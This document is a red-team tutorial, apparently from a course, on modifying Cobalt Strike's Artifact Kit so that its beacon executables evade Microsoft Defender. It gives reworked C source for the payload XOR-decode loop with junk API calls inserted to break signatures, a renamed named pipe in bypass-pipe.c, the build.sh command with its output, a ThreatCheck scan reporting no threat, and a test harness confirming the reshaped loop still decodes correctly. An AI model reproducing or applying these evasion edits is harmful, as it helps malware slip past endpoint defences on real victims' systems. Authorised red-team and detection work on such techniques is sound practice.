Arsenal Kit

Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit ships as part of the Arsenal Kit, a collection of kits; the Artifact Kit itself is a source-code framework for building executables and DLLs that evade some antivirus products.

The code in patch.c has to be modified for the AV bypass to work, because Defender is updated constantly to detect the binaries the stock kit produces. The simplest approach with the Arsenal Kit is to change the lines below.

Modify this part of the code. The stock decode loop is what gets signatured; the replacement does the same 8-byte XOR over the buffer, but in 8-byte blocks with a harmless GetVersion() call in between, so the compiled bytes differ while the decoded payload is identical. The original loop is left commented out for comparison.

/opt/CS491/arsenal-kit/kits/artifact/src-common/patch.c

   /* decode the payload with the key */
   /* stock kit loop, one byte per iteration */
//   for (int x = 0; x < length; x++) {
//      *((char *)ptr + x) = *((char *)buffer + x) ^ key[x % 8]; // 8 byte XoR
//   }

   /* same XOR, walked in 8-byte blocks; the inner bound check handles a
      length that is not a multiple of 8 */
   for (int c = 0; c < length; c += 8) {
      for (int i = 0; i < 8 && (c + i) < length; i++) {
         char *y = (char *)ptr + c + i;
         char *r = (char *)buffer + c + i;

         // Benign API call whose result is discarded; it is here only to
         // change the shape of the compiled loop, not its output
         GetVersion();

         *y = *r ^ key[(c + i) % 8];  // same 8-byte XOR as the original loop
      }
   }

Modify the following file. The stock line already avoids the literal \\.\pipe\ string by emitting it with %c and adds a numeric suffix taken from GetTickCount(); the modified line renames the pipe to doom\s and drops the suffix. Note that every artifact built from this source will then create the same pipe name, which is a static indicator a defender can hunt for; keep a %d suffix if you only want to change the prefix.

/opt/CS491/arsenal-kit/kits/artifact/src-common/bypass-pipe.c

void start(HINSTANCE mhandle) {
   /* switched from snprintf... as some A/V product was flagging based on the function *sigh*
      92, 92, 46, 92, 112, 105, 112, 101, 92 is \\.\pipe\

   */
   //sprintf(pipename, "%c%c%c%c%c%c%c%c%cnetsvc\\%d", 92, 92, 46, 92, 112, 105, 112, 101, 92, (int)(GetTickCount() % 9898));
   sprintf(pipename, "%c%c%c%c%c%c%c%c%cdoom\\s", 92, 92, 46, 92, 112, 105, 112, 101, 92);

   /* start our server and our client */
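
As an added example (not code from this page, the course it follows, or the Artifact Kit itself), the stand-alone C program below checks the two edits above offline: it confirms that the restructured decode loop from patch.c recovers exactly the same bytes as the kit's original one-byte-per-iteration XOR loop, including the tail when the length is not a multiple of 8, and it builds the pipe name the way the stock bypass-pipe.c line does. The Windows calls are assumed away so it compiles anywhere: a volatile counter stands in for the junk GetVersion() call and the GetTickCount() value is passed in as a parameter. The key, the sample buffer and the file name xorcheck.c are constructed for the example, not taken from a real stage.

```c
/*
 * xorcheck.c (assumed name): offline equivalence check for a reshaped
 * Artifact Kit decode loop, plus the %c-built pipe name.
 * Added example, not part of the Artifact Kit.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stands in for the discarded GetVersion() call in the modified loop. */
static volatile unsigned long junk_calls;
static void junk_api_call(void) { junk_calls++; }

/* Stock kit loop: one byte per iteration, the 8-byte key repeats. */
void decode_original(void *ptr, const void *buffer, int length, const char key[8]) {
    for (int x = 0; x < length; x++)
        ((char *)ptr)[x] = ((const char *)buffer)[x] ^ key[x % 8];
}

/* Restructured loop as patched above: 8-byte blocks, bound check on the
 * tail, one junk call per byte. Same output, different compiled shape. */
void decode_modified(void *ptr, const void *buffer, int length, const char key[8]) {
    for (int c = 0; c < length; c += 8) {
        for (int i = 0; i < 8 && (c + i) < length; i++) {
            char *y = (char *)ptr + c + i;
            const char *r = (const char *)buffer + c + i;
            junk_api_call();
            *y = *r ^ key[(c + i) % 8];
        }
    }
}

/* XOR is its own inverse, so the known-good loop also "encodes" the
 * plaintext; both loops must then recover it byte for byte. */
int loops_equivalent(const unsigned char *plain, int length, const char key[8]) {
    if (length <= 0) return 1;
    unsigned char *enc = malloc(length), *a = malloc(length), *b = malloc(length);
    if (!enc || !a || !b) { free(enc); free(a); free(b); return 0; }
    decode_original(enc, plain, length, key);   /* encode */
    decode_original(a, enc, length, key);       /* decode, stock loop */
    decode_modified(b, enc, length, key);       /* decode, patched loop */
    int ok = memcmp(a, plain, length) == 0 && memcmp(b, plain, length) == 0;
    free(enc); free(a); free(b);
    return ok;
}

/* Runs the check over a constructed buffer (not a real stage) of the
 * given length with a constructed key; returns 1 on success. */
int check_length(int length) {
    static const char key[8] = { 0x13, 0x37, 'd', 'e', 'a', 'd', 0x00, 0x7f };
    unsigned char *plain = malloc(length > 0 ? (size_t)length : 1);
    if (!plain) return 0;
    for (int i = 0; i < length; i++) plain[i] = (unsigned char)(i * 7 + 3);
    int ok = loops_equivalent(plain, length, key);
    free(plain);
    return ok;
}

/* Builds \\.\pipe\netsvc\<n> without the literal "\\.\pipe\" string, as
 * the stock bypass-pipe.c line does; tick replaces GetTickCount(). */
int build_pipename(char *out, size_t cap, unsigned long tick) {
    return snprintf(out, cap, "%c%c%c%c%c%c%c%c%cnetsvc\\%d",
                    92, 92, 46, 92, 112, 105, 112, 101, 92, (int)(tick % 9898));
}

/* Convenience check: does the pipe name for this tick equal expected? */
int pipename_equals(unsigned long tick, const char *expected) {
    char name[64];
    build_pipename(name, sizeof name, tick);
    return strcmp(name, expected) == 0;
}

int main(void) {
    char name[64];
    build_pipename(name, sizeof name, 123456UL);
    printf("decode loops equivalent for a 310272-byte stage: %s\n",
           check_length(310272) ? "yes" : "NO");
    printf("pipe name for tick 123456: %s\n", name);
    return 0;
}
```

Build with `cc -std=c99 -o xorcheck xorcheck.c` and run it. Repeating this kind of equivalence check whenever the decode loop is reshaped is worth the minute it takes: a loop that merely looks different but decodes one byte wrong yields an artifact that passes ThreatCheck and never calls back, which is much harder to diagnose from the Windows side.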

Compile the artifacts. The build.sh arguments, in order, are: technique (pipe), allocator (VirtualAlloc), stage size in bytes, RDLL size in KB, include resource file (false), stack spoofing (false), system call method (none) and the output directory.

┌──(root㉿kali)-[/opt/CS491/arsenal-kit/kits/artifact]
└─# ./build.sh pipe VirtualAlloc 310272 5 false false none /opt/CS491/artifacts 
[Artifact kit] [+] You have a x86_64 mingw--I will recompile the artifacts
[Artifact kit] [*] Using allocator: VirtualAlloc
[Artifact kit] [*] Using STAGE size: 310272
[Artifact kit] [*] Using RDLL size: 5K
[Artifact kit] [*] Using system call method: none
[Artifact kit] [+] Artifact Kit: Building artifacts for technique: pipe
[Artifact kit] [*] Recompile artifact32.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32svc.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32big.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32big.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32svcbig.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64.x64.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64svc.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64big.x64.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64big.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64svcbig.exe with src-common/bypass-pipe.c
[Artifact kit] [+] The artifacts for the bypass technique 'pipe' are saved in '/opt/CS491/artifacts/pipe'

We check that the artifact is not flagged using ThreatCheck. The name artifact64svcbig.exe indicates a 64-bit stageless ("big") service executable. Note that ThreatCheck only scans the file on disk against the local engine's static signatures (Defender by default); a clean result says nothing about behavioural or in-memory detection once the beacon is running.

C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f  C:\Payloads\artifacts\pipe\artifact64svcbig.exe
[+] No threat found!
[*] Run time: 0.72s

Finally, we generate the beacons with the new artifacts and test them in a Windows environment.

References

https://training.zeropointsecurity.co.uk/courses/take/red-team-ops/texts/37495050-artifact-kit